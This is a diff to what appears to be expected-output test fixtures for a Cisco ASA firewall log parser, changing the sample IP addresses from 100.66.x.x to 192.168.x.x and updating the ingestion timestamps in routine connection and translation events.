@@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, 
@@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165010Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:33:41.995310200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165016100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:33:41.995314700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" 
@@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165024200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995319900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165032100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:33:41.995326200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165040300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995331100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, 
@@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165048400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:33:41.995372700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165054Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:33:41.995380500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165058900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:33:41.995385500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165063600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:33:41.995390700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165069100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:33:41.995397100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165073500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:33:41.995403400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165077900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:33:41.995409700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165081800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:33:41.995416Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165087Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:33:41.995422500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165092700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:33:41.995428900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165100900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:33:41.995435100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165105700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:33:41.995441300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165110400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:33:41.995447700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165116Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:33:41.995454100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165122200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:33:41.995460400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165129Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": "2021-12-09T13:33:41.995465Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165137200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:33:41.995470400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165145200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:33:41.995475600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165153200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:33:41.995482100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165161100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:33:41.995486500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165169100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:33:41.995491300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165176900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:33:41.995495800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
